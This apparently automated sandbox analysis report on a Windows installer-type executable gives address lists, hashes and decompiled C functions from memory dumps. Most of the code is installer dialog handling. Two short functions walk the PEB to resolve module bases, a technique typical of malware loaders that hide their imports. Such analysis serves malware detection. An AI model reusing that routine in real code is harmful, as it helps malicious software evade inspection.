0x004072fe
0x004075a3
0x00000000
0x004075a3
0x00407304
0x00407305
0x00407305
0x0040730d
0x00407310
0x00407314
0x00407316
0x00407318
0x0040731b
0x00000000
0x00000000
0x00407323
0x00407329
0x0040732b
0x0040732d
0x0040732e
0x00407343
0x00407343
0x00407346
0x00407348
0x00407348
0x0040734a
0x0040734f
0x00407351
0x00407358
0x0040735a
0x00407362
0x00407362
0x00407364
0x00407365
0x00407374
0x00407378
0x0040737c
0x0040737f
0x00407382
0x00407387
0x0040738a
0x00407390
0x00407397
0x0040739d
0x00407596
0x00407596
0x0040759b
0x004075aa
0x00000000
0x00000000
0x00000000
0x0040759b
0x004073aa
0x004073ad
0x004073b0
0x004073b3
0x004073b7
0x00000000
0x00000000
0x004073c2
0x004073c5
0x004073c6
0x004073c8
0x004073ce
0x004073d1
0x00000000
0x00000000
0x004073d7
0x004073d8
0x004073db
0x004073de
0x004073e1
0x004073e7
0x004073e9
0x004073e9
0x004073f1
0x004073f5
0x004073fa
0x0040741f
0x00407425
0x00407427
0x00407429
0x0040742c
0x00407435
0x00000000
0x00000000
0x004073fc
0x004073fc
0x00407405
0x00407409
0x00000000
0x00000000
0x0040741a
0x0040741a
0x0040741d
0x00000000
0x00000000
0x0040740d
0x00407410
0x00407412
0x00407416
0x00000000
0x00000000
0x00407418
0x00407418
0x00000000
0x0040741a
0x0040743e
0x00407444
0x0040744e
0x00407450
0x00407455
0x00407457
0x0040748d
0x00407459
0x00407459
0x0040745c
0x0040745f
0x00407469
0x0040746c
0x00407473
0x0040747e
0x00407485
0x00407485
0x0040748f
0x00407492
0x00407494
0x0040749a
0x0040749a
0x004074a3
0x004074a6
0x004074ab
0x004074ba
0x004074c2
0x004074c7
0x004074eb
0x004074f3
0x004074f7
0x004074fd
0x004074c9
0x004074d7
0x004074da
0x004074e0
0x004074e0
0x00407501
0x004074bc
0x004074bc
0x004074bc
0x00407512
0x00407516
0x00407522
0x0040751d
0x00407520
0x00407520
0x0040752a
0x0040752f
0x00407537
0x00407533
0x00407535
0x00407535
0x0040753d
0x0040753f
0x00407546
0x00407550
0x0040755a
0x00407576
0x0040757a
0x004073bf
0x004073c5
0x004073c6
0x004073c8
0x004073ce
0x004073d1
0x00000000
0x00000000
0x00000000
0x004073d1
0x00000000
0x00000000
0x00000000
0x00000000
0x0040755c
0x0040755c
0x0040755c
0x00407561
0x0040756a
0x00407573
0x00000000
0x00407573
0x00407580
0x00407580
0x00407583
0x0040758a
0x0040758d
0x00000000
0x004073b0
0x00407330
0x00407332
0x00407332
0x00407336
0x00407339
0x0040733a
0x0040733a
0x00000000
0x00407332
0x004072a6
0x004072ac
0x00000000

Memory Dump Source

Source File: 00000000.00000002.211058940.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.211048716.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211076911.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211093563.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211104465.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211112400.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211118690.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211124637.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e205b8326ae89ea7e41b2cb83266b2effedd335e5b54ad7d386a065d8ff2d5ef
Instruction ID: 0a9d7053db9648894e52107a0598598bb6c65082166a45c8961a79b8daba83ed
Opcode Fuzzy Hash: e205b8326ae89ea7e41b2cb83266b2effedd335e5b54ad7d386a065d8ff2d5ef
Instruction Fuzzy Hash: 7AC13831E042199BCF18CF68D8905EEBBB2BF99314F25826AD85677380D734A942CF95

Uniqueness

Uniqueness Score: -1.00%

Function 703C47AD, Relevance: .0, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E703C47AD(void* __eflags, intOrPtr* _a4) {
				intOrPtr* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _t35;

				_v16 =  *[fs:0x30];
				_v12 =  *((intOrPtr*)(_v16 + 0xc));
				_v20 =  *((intOrPtr*)(_v12 + 0xc));
				_v8 =  *((intOrPtr*)(_v12 + 0xc));
				while(E703C46F1(_t35,  *((intOrPtr*)(_v8 + 0x30)), _a4) != 0) {
					_v8 =  *_v8;
					if(_v8 != _v20) {
						continue;
					}
					return 0;
				}
				return  *((intOrPtr*)(_v8 + 0x28));
			}

0x703c47b9
0x703c47c2
0x703c47cb
0x703c47d4
0x703c47d7
0x703c47f6
0x703c47ff
0x00000000
0x00000000
0x00000000
0x703c4801
0x00000000

Memory Dump Source

Source File: 00000000.00000002.213465230.00000000703C3000.00000040.00020000.sdmp, Offset: 703C0000, based on PE: true

Associated: 00000000.00000002.213449488.00000000703C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.213454915.00000000703C1000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.213460076.00000000703C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.213470666.00000000703C5000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a60233801de0e8d64e4fc61689fdab8e9d3162a2ace7c33a53d9f49bfda1752
Instruction ID: 85a1896bee1c086362d819dd47f0d98073adfd611daab11819d78096f2d925e2
Opcode Fuzzy Hash: 3a60233801de0e8d64e4fc61689fdab8e9d3162a2ace7c33a53d9f49bfda1752
Instruction Fuzzy Hash: 9F014D78E10248EFDB41DF98C980A9DBBF5FB08220F1184A5E914E7711D370EE509B40

Uniqueness

Uniqueness Score: -1.00%

Function 703C45AA, Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E703C45AA() {

				return  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18));
			}

0x703c45c1

Memory Dump Source

Source File: 00000000.00000002.213465230.00000000703C3000.00000040.00020000.sdmp, Offset: 703C0000, based on PE: true

Associated: 00000000.00000002.213449488.00000000703C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.213454915.00000000703C1000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.213460076.00000000703C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.213470666.00000000703C5000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
Instruction ID: 58c6f5837427d6eca2c2deaad74ce6c6656098581891570576efec04afcca601
Opcode Fuzzy Hash: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
Instruction Fuzzy Hash: 42D001392A1A48CFC241CF4CD084E40B3F8FB0DA20B068092FA0A8BB32C334FC00DA80

Uniqueness

Uniqueness Score: -1.00%

Function 00404CD6, Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 491
windowmemoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00404CD6(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				long _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				signed char* _v32;
				int _v36;
				signed int _v44;
				int _v48;
				signed int* _v60;
				signed char* _v64;
				signed int _v68;
				long _v72;
				void* _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t203;
				intOrPtr _t206;
				intOrPtr _t207;
				long _t212;
				signed int _t216;
				signed int _t227;
				void* _t230;
				void* _t231;
				int _t237;
				long _t242;
				long _t243;
				signed int _t244;
				signed int _t250;
				signed int _t252;
				signed char _t253;
				signed char _t259;
				void* _t264;
				void* _t266;
				signed char* _t284;
				signed char _t285;
				long _t290;
				signed int _t300;
				signed int _t308;
				signed char* _t316;
				int _t320;
				int _t321;
				signed int* _t322;
				int _t323;
				long _t324;
				signed int _t325;
				long _t327;
				int _t328;
				signed int _t329;
				void* _t331;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_v8 = GetDlgItem(_a4, 0x408);
				_t331 = SendMessageA;
				_v24 =  *0x42f488;
				_v28 =  *0x42f454 + 0x94;
				_t320 = 0x10;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t298 = _a16;
					} else {
						_a12 = 0;
						_t298 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t298;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t298 + 4)) == 0x408) {
							if(( *0x42f45d & 0x00000002) != 0) {
								L41:
								if(_v16 != 0) {
									_t242 = _v16;
									if( *((intOrPtr*)(_t242 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, 0,  *(_t242 + 0x5c));
									}
									_t243 = _v16;
									if( *((intOrPtr*)(_t243 + 8)) == 0xfffffe6a) {
										_t298 = _v24;
										_t244 =  *(_t243 + 0x5c);
										if( *((intOrPtr*)(_t243 + 0xc)) != 2) {
											 *(_t244 * 0x418 + _t298 + 8) =  *(_t244 * 0x418 + _t298 + 8) & 0xffffffdf;
										} else {
											 *(_t244 * 0x418 + _t298 + 8) =  *(_t244 * 0x418 + _t298 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t298 = 0 | _a8 != 0x00000413;
								_t250 = E00404C24(_v8, _a8 != 0x413);
								_t325 = _t250;
								if(_t325 >= 0) {
									_t99 = _v24 + 8; // 0x8
									_t298 = _t250 * 0x418 + _t99;
									_t252 =  *_t298;
									if((_t252 & 0x00000010) == 0) {
										if((_t252 & 0x00000040) == 0) {
											_t253 = _t252 ^ 0x00000001;
										} else {
											_t259 = _t252 ^ 0x00000080;
											if(_t259 >= 0) {
												_t253 = _t259 & 0x000000fe;
											} else {
												_t253 = _t259 | 0x00000001;
											}
										}
										 *_t298 = _t253;
										E0040117D(_t325);
										_a12 = _t325 + 1;
										_a16 =  !( *0x42f45c) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t298 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageA(_v8, 0x200, 0, 0);
							}
							if(_a8 == 0x40b) {
								_t230 =  *0x42a89c;
								if(_t230 != 0) {
									ImageList_Destroy(_t230);
								}
								_t231 =  *0x42a8b0;
								if(_t231 != 0) {
									GlobalFree(_t231);
								}
								 *0x42a89c = 0;
								 *0x42a8b0 = 0;
								 *0x42f4c0 = 0;
							}
							if(_a8 != 0x40f) {
								L90:
								if(_a8 == 0x420 && ( *0x42f45d & 0x00000001) != 0) {
									_t321 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t321);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t321);
								}
								goto L93;
							} else {
								E004011EF(_t298, 0, 0);
								_t203 = _a12;
								if(_t203 != 0) {
									if(_t203 != 0xffffffff) {
										_t203 = _t203 - 1;
									}
									_push(_t203);
									_push(8);
									E00404CA4();
								}
								if(_a16 == 0) {
									L75:
									E004011EF(_t298, 0, 0);
									_v36 =  *0x42a8b0;
									_t206 =  *0x42f488;
									_v64 = 0xf030;
									_v24 = 0;
									if( *0x42f48c <= 0) {
										L86:
										if( *0x42f44c == 4) {
											InvalidateRect(_v8, 0, 1);
										}
										_t207 =  *0x42ec1c; // 0x82c3c2
										if( *((intOrPtr*)(_t207 + 0x10)) != 0) {
											E00404BDF(0x3ff, 0xfffffffb, E00404BF7(5));
										}
										goto L90;
									}
									_t322 = _t206 + 8;
									do {
										_t212 =  *((intOrPtr*)(_v36 + _v24 * 4));
										if(_t212 != 0) {
											_t300 =  *_t322;
											_v72 = _t212;
											_v76 = 8;
											if((_t300 & 0x00000001) != 0) {
												_v76 = 9;
												_v60 =  &(_t322[4]);
												_t322[0] = _t322[0] & 0x000000fe;
											}
											if((_t300 & 0x00000040) == 0) {
												_t216 = (_t300 & 0x00000001) + 1;
												if((_t300 & 0x00000010) != 0) {
													_t216 = _t216 + 3;
												}
											} else {
												_t216 = 3;
											}
											_v68 = (_t216 << 0x0000000b | _t300 & 0x00000008) + (_t216 << 0x0000000b | _t300 & 0x00000008) | _t300 & 0x00000020;
											SendMessageA(_v8, 0x1102, (_t300 >> 0x00000005 & 0x00000001) + 1, _v72);
											SendMessageA(_v8, 0x110d, 0,  &_v76);
										}
										_v24 = _v24 + 1;
										_t322 =  &(_t322[0x106]);
									} while (_v24 <  *0x42f48c);
									goto L86;
								} else {
									_t323 = E004012E2( *0x42a8b0);
									E00401299(_t323);
									_t227 = 0;
									_t298 = 0;
									if(_t323 <= 0) {
										L74:
										SendMessageA(_v12, 0x14e, _t298, 0);
										_a16 = _t323;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v28 + _t227 * 4)) != 0) {
											_t298 = _t298 + 1;
										}
										_t227 = _t227 + 1;
									} while (_t227 < _t323);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L93;
						} else {
							_t237 = SendMessageA(_v12, 0x147, 0, 0);
							if(_t237 == 0xffffffff) {
								goto L93;
							}
							_t324 = SendMessageA(_v12, 0x150, _t237, 0);
							if(_t324 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t324 * 4)) == 0) {
								_t324 = 0x20;
							}
							E00401299(_t324);
							SendMessageA(_a4, 0x420, 0, _t324);
							_a12 = _a12 | 0xffffffff;
							_a16 = 0;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v36 = 0;
					 *0x42f4c0 = _a4;
					_v20 = 2;
					 *0x42a8b0 = GlobalAlloc(0x40,  *0x42f48c << 2);
					_t264 = LoadImageA( *0x42f440, 0x6e, 0, 0, 0, 0);
					 *0x42a8a4 =  *0x42a8a4 | 0xffffffff;
					_v16 = _t264;
					 *0x42a8ac = SetWindowLongA(_v8, 0xfffffffc, E004052E8);
					_t266 = ImageList_Create(_t320, _t320, 0x21, 6, 0);
					 *0x42a89c = _t266;
					ImageList_AddMasked(_t266, _v16, 0xff00ff);
					SendMessageA(_v8, 0x1109, 2,  *0x42a89c);
					if(SendMessageA(_v8, 0x111c, 0, 0) < _t320) {
						SendMessageA(_v8, 0x111b, _t320, 0);
					}
					DeleteObject(_v16);
					_t327 = 0;
					do {
						_t272 =  *((intOrPtr*)(_v28 + _t327 * 4));
						if( *((intOrPtr*)(_v28 + _t327 * 4)) != 0) {
							if(_t327 != 0x20) {
								_v20 = 0;
							}
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, 0, E004062E0(0, _t327, _t331, 0, _t272)), _t327);
						}
						_t327 = _t327 + 1;
					} while (_t327 < 0x21);
					_t328 = _a16;
					_push( *((intOrPtr*)(_t328 + 0x30 + _v20 * 4)));
					_push(0x15);
					E004042D1(_a4);
					_push( *((intOrPtr*)(_t328 + 0x34 + _v20 * 4)));
					_push(0x16);
					E004042D1(_a4);
					_t329 = 0;
					_v16 = 0;
					if( *0x42f48c <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t316 = _v24 + 8;
						_v32 = _t316;
						do {
							_t284 =  &(_t316[0x10]);
							if( *_t284 != 0) {
								_v64 = _t284;
								_t285 =  *_t316;
								_v88 = _v16;
								_t308 = 0x20;
								_v84 = 0xffff0002;
								_v80 = 0xd;
								_v68 = _t308;
								_v44 = _t329;
								_v72 = _t285 & _t308;
								if((_t285 & 0x00000002) == 0) {
									if((_t285 & 0x00000004) == 0) {
										 *( *0x42a8b0 + _t329 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v88);
									} else {
										_v16 = SendMessageA(_v8, 0x110a, 3, _v16);
									}
								} else {
									_v80 = 0x4d;
									_v48 = 1;
									_t290 = SendMessageA(_v8, 0x1100, 0,  &_v88);
									_v36 = 1;
									 *( *0x42a8b0 + _t329 * 4) = _t290;
									_v16 =  *( *0x42a8b0 + _t329 * 4);
								}
							}
							_t329 = _t329 + 1;
							_t316 =  &(_v32[0x418]);
							_v32 = _t316;
						} while (_t329 <  *0x42f48c);
						if(_v36 != 0) {
							L20:
							if(_v20 != 0) {
								E00404306(_v8);
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00404306(_v12);
								L93:
								return E00404338(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}

0x00404cf4
0x00404cfc
0x00404d04
0x00404d0a
0x00404d22
0x00404d25
0x00404d26
0x00404f53
0x00404f5a
0x00404f6e
0x00404f5c
0x00404f5e
0x00404f61
0x00404f62
0x00404f69
0x00404f69
0x00404f7a
0x00404f88
0x00404f8b
0x00404fa1
0x00405016
0x00405019
0x0040501b
0x00405025
0x00405033
0x00405033
0x00405035
0x0040503f
0x00405045
0x00405048
0x0040504b
0x00405066
0x0040504d
0x00405057
0x00405057
0x0040504b
0x0040503f
0x00000000
0x00405019
0x00404fa6
0x00404fb1
0x00404fb6
0x00404fbd
0x00404fc2
0x00404fc6
0x00404fd1
0x00404fd1
0x00404fd5
0x00404fd9
0x00404fdd
0x00404ff0
0x00404fdf
0x00404fdf
0x00404fe6
0x00404fec
0x00404fe8
0x00404fe8
0x00404fe8
0x00404fe6
0x00404ff4
0x00404ff6
0x00405009
0x0040500c
0x0040500f
0x0040500f
0x00404fd9
0x00000000
0x00404fc6
0x00404fa8
0x00404faf
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00405069
0x00405069
0x00405070
0x004050e1
0x004050e9
0x004050f1
0x004050f1
0x004050fa
0x004050fc
0x00405103
0x00405106
0x00405106
0x0040510c
0x00405113
0x00405116
0x00405116
0x0040511c
0x00405122
0x00405128
0x00405128
0x00405135
0x00405295
0x0040529c
0x004052b9
0x004052bf
0x004052d1
0x004052d1
0x00000000
0x0040513b
0x0040513d
0x00405142
0x00405147
0x0040514c
0x0040514e
0x0040514e
0x0040514f
0x00405150
0x00405152
0x00405152
0x0040515a
0x0040519b
0x0040519d
0x004051ad
0x004051b0
0x004051b5
0x004051bc
0x004051bf
0x00405261
0x00405269
0x00405271
0x00405271
0x00405277
0x0040527f
0x00405290
0x00405290
0x00000000
0x0040527f
0x004051c5
0x004051c8
0x004051ce
0x004051d3
0x004051d5
0x004051d7
0x004051dd
0x004051e4
0x004051e9
0x004051f0
0x004051f3
0x004051f3
0x004051fa
0x00405206
0x0040520a
0x0040520c
0x0040520c
0x004051fc
0x004051fe
0x004051fe
0x0040522c
0x00405238
0x00405247
0x00405247
0x00405249
0x0040524c
0x00405255
0x00000000
0x0040515c
0x00405167
0x0040516a
0x0040516f
0x00405171
0x00405175
0x00405185
0x0040518f
0x00405191
0x00405194
0x00000000
0x00000000
0x00000000
0x00000000
0x00405177
0x00405177
0x0040517d
0x0040517f
0x0040517f
0x00405180
0x00405181
0x00000000
0x00405177
0x0040515a
0x00405135
0x00405078
0x00000000
0x0040508e
0x00405098
0x0040509d
0x00000000
0x00000000
0x004050af
0x004050b4
0x004050c0
0x004050c0
0x004050c2
0x004050d1
0x004050d3
0x004050d7
0x004050da
0x00000000
0x004050da
0x00405078
0x00404d2c
0x00404d2f
0x00404d32
0x00404d42
0x00404d55
0x00404d60
0x00404d66
0x00404d74
0x00404d87
0x00404d8c
0x00404d97
0x00404da0
0x00404db6
0x00404dc6
0x00404dd2
0x00404dd2
0x00404dd7
0x00404ddd
0x00404ddf
0x00404de2
0x00404de7
0x00404dec
0x00404dee
0x00404dee
0x00404e0e
0x00404e0e
0x00404e10
0x00404e11
0x00404e16
0x00404e1c
0x00404e20
0x00404e25
0x00404e2d
0x00404e31
0x00404e36
0x00404e3b
0x00404e43
0x00404e46
0x00404f15
0x00404f28
0x00000000
0x00404e4c
0x00404e4f
0x00404e52
0x00404e55
0x00404e55
0x00404e5a
0x00404e63
0x00404e66
0x00404e6a
0x00404e6d
0x00404e70
0x00404e79
0x00404e82
0x00404e85
0x00404e88
0x00404e8b
0x00404ec9
0x00404ef4
0x00404ecb
0x00404eda
0x00404eda
0x00404e8d
0x00404e90
0x00404e9e
0x00404ea8
0x00404eb0
0x00404eb7
0x00404ec2
0x00404ec2
0x00404e8b
0x00404efa
0x00404efb
0x00404f07
0x00404f07
0x00404f13
0x00404f2e
0x00404f31
0x00404f4e
0x00000000
0x00404f33
0x00404f38
0x00404f41
0x004052d3
0x004052e5
0x004052e5
0x00404f31
0x00000000
0x00404f13
0x00404e46

APIs

GetDlgItem.USER32 ref: 00404CED
GetDlgItem.USER32 ref: 00404CFA
GlobalAlloc.KERNEL32(00000040,?), ref: 00404D49
LoadImageA.USER32 ref: 00404D60
SetWindowLongA.USER32 ref: 00404D7A
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D8C
ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404DA0
SendMessageA.USER32(?,00001109,00000002), ref: 00404DB6
SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404DC2
SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404DD2
DeleteObject.GDI32(00000110), ref: 00404DD7
SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404E02
SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404E0E
SendMessageA.USER32(?,00001100,00000000,?), ref: 00404EA8
SendMessageA.USER32(?,0000110A,00000003,00000110), ref: 00404ED8

Part of subcall function 00404306: SendMessageA.USER32(00000028,?,00000001,00404136), ref: 00404314

SendMessageA.USER32(?,00001100,00000000,?), ref: 00404EEC
GetWindowLongA.USER32 ref: 00404F1A
SetWindowLongA.USER32 ref: 00404F28
ShowWindow.USER32(?,00000005), ref: 00404F38
SendMessageA.USER32(?,00000419,00000000,?), ref: 00405033
SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00405098
SendMessageA.USER32(?,00000150,00000000,00000000), ref: 004050AD
SendMessageA.USER32(?,00000420,00000000,00000020), ref: 004050D1
SendMessageA.USER32(?,00000200,00000000,00000000), ref: 004050F1
ImageList_Destroy.COMCTL32(?), ref: 00405106
GlobalFree.KERNEL32 ref: 00405116
SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 0040518F
SendMessageA.USER32(?,00001102,?,?), ref: 00405238
SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00405247
InvalidateRect.USER32(?,00000000,00000001), ref: 00405271
ShowWindow.USER32(?,00000000), ref: 004052BF
GetDlgItem.USER32 ref: 004052CA
ShowWindow.USER32(00000000), ref: 004052D1

Strings

N, xrefs: 00404F71
, xrefs: 004052A9
M, xrefs: 00404E90

Memory Dump Source

Source File: 00000000.00000002.211058940.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.211048716.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211076911.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211093563.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211104465.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211112400.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211118690.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211124637.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 2564846305-813528018
Opcode ID: 522b9aef29dd3697019702309650a8f995276aa537964cdbeefa37b65f42cde9
Instruction ID: 815a2de4fdf1bcdeb3ef1062daa1c2d9177896ce2fe1d13919dbb69bdfef4a57
Opcode Fuzzy Hash: 522b9aef29dd3697019702309650a8f995276aa537964cdbeefa37b65f42cde9
Instruction Fuzzy Hash: 21027BB0A00209AFDB20DF94DD45AAE7BB5FB44314F50817AF610BA2E0C7799E52CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00403DFD, Relevance: 48.3, APIs: 32, Instructions: 346
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00403DFD(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				struct HWND__* _t49;
				signed int _t68;
				struct HWND__* _t74;
				signed int _t87;
				struct HWND__* _t92;
				signed int _t100;
				int _t104;
				signed int _t116;
				signed int _t117;
				int _t118;
				signed int _t123;
				struct HWND__* _t126;
				struct HWND__* _t127;
				int _t128;
				long _t131;
				int _t133;
				int _t134;
				void* _t135;
				void* _t143;

				_t116 = _a8;
				if(_t116 == 0x110 || _t116 == 0x408) {
					_t35 = _a12;
					_t126 = _a4;
					__eflags = _t116 - 0x110;
					 *0x42a8a0 = _t35;
					if(_t116 == 0x110) {
						 *0x42f448 = _t126;
						 *0x42a8b4 = GetDlgItem(_t126, 1);
						_t92 = GetDlgItem(_t126, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x429880 = _t92;
						E004042D1(_t126);
						SetClassLongA(_t126, 0xfffffff2,  *0x42ec28);
						 *0x42ec0c = E0040140B(4);
						_t35 = 1;
						__eflags = 1;
						 *0x42a8a0 = 1;
					}
					_t123 =  *0x40a1f8; // 0xffffffff
					_t134 = 0;
					_t131 = (_t123 << 6) +  *0x42f480;
					__eflags = _t123;
					if(_t123 < 0) {
						L34:
						E0040431D(0x40b);
						while(1) {
							_t37 =  *0x42a8a0;
							 *0x40a1f8 =  *0x40a1f8 + _t37;
							_t131 = _t131 + (_t37 << 6);
							_t39 =  *0x40a1f8; // 0xffffffff
							__eflags = _t39 -  *0x42f484;
							if(_t39 ==  *0x42f484) {
								E0040140B(1);
							}
							__eflags =  *0x42ec0c - _t134; // 0x0
							if(__eflags != 0) {
								break;
							}
							__eflags =  *0x40a1f8 -  *0x42f484; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_t117 =  *(_t131 + 0x14);
							E004062E0(_t117, _t126, _t131, 0x437800,  *((intOrPtr*)(_t131 + 0x24)));
							_push( *((intOrPtr*)(_t131 + 0x20)));
							_push(0xfffffc19);
							E004042D1(_t126);
							_push( *((intOrPtr*)(_t131 + 0x1c)));
							_push(0xfffffc1b);
							E004042D1(_t126);
							_push( *((intOrPtr*)(_t131 + 0x28)));
							_push(0xfffffc1a);
							E004042D1(_t126);
							_t49 = GetDlgItem(_t126, 3);
							__eflags =  *0x42f4ec - _t134;
							_v32 = _t49;
							if( *0x42f4ec != _t134) {
								_t117 = _t117 & 0x0000fefd | 0x00000004;
								__eflags = _t117;
							}
							ShowWindow(_t49, _t117 & 0x00000008);
							EnableWindow( *(_t135 + 0x30), _t117 & 0x00000100);
							E004042F3(_t117 & 0x00000002);
							_t118 = _t117 & 0x00000004;
							EnableWindow( *0x429880, _t118);
							__eflags = _t118 - _t134;
							if(_t118 == _t134) {
								_push(1);
							} else {
								_push(_t134);
							}
							EnableMenuItem(GetSystemMenu(_t126, _t134), 0xf060, ??);
							SendMessageA( *(_t135 + 0x38), 0xf4, _t134, 1);
							__eflags =  *0x42f4ec - _t134;
							if( *0x42f4ec == _t134) {
								_push( *0x42a8b4);
							} else {
								SendMessageA(_t126, 0x401, 2, _t134);
								_push( *0x429880);
							}
							E00404306();
							E0040624D(0x42a8b8, E00403DDE());
							E004062E0(0x42a8b8, _t126, _t131,  &(0x42a8b8[lstrlenA(0x42a8b8)]),  *((intOrPtr*)(_t131 + 0x18)));
							SetWindowTextA(_t126, 0x42a8b8);
							_push(_t134);
							_t68 = E00401389( *((intOrPtr*)(_t131 + 8)));
							__eflags = _t68;
							if(_t68 != 0) {
								continue;
							} else {
								__eflags =  *_t131 - _t134;
								if( *_t131 == _t134) {
									continue;
								}
								__eflags =  *(_t131 + 4) - 5;
								if( *(_t131 + 4) != 5) {
									DestroyWindow( *0x42ec18);
									 *0x42a090 = _t131;
									__eflags =  *_t131 - _t134;
									if( *_t131 <= _t134) {
										goto L58;
									}
									_t74 = CreateDialogParamA( *0x42f440,  *_t131 +  *0x42ec20 & 0x0000ffff, _t126,  *(0x40a1fc +  *(_t131 + 4) * 4), _t131);
									__eflags = _t74 - _t134;
									 *0x42ec18 = _t74;
									if(_t74 == _t134) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t131 + 0x2c)));
									_push(6);
									E004042D1(_t74);
									GetWindowRect(GetDlgItem(_t126, 0x3fa), _t135 + 0x10);
									ScreenToClient(_t126, _t135 + 0x10);
									SetWindowPos( *0x42ec18, _t134,  *(_t135 + 0x20),  *(_t135 + 0x20), _t134, _t134, 0x15);
									_push(_t134);
									E00401389( *((intOrPtr*)(_t131 + 0xc)));
									__eflags =  *0x42ec0c - _t134; // 0x0
									if(__eflags != 0) {
										goto L61;
									}
									ShowWindow( *0x42ec18, 8);
									E0040431D(0x405);
									goto L58;
								}
								__eflags =  *0x42f4ec - _t134;
								if( *0x42f4ec != _t134) {
									goto L61;
								}
								__eflags =  *0x42f4e0 - _t134;
								if( *0x42f4e0 != _t134) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x42ec18);
						 *0x42f448 = _t134;
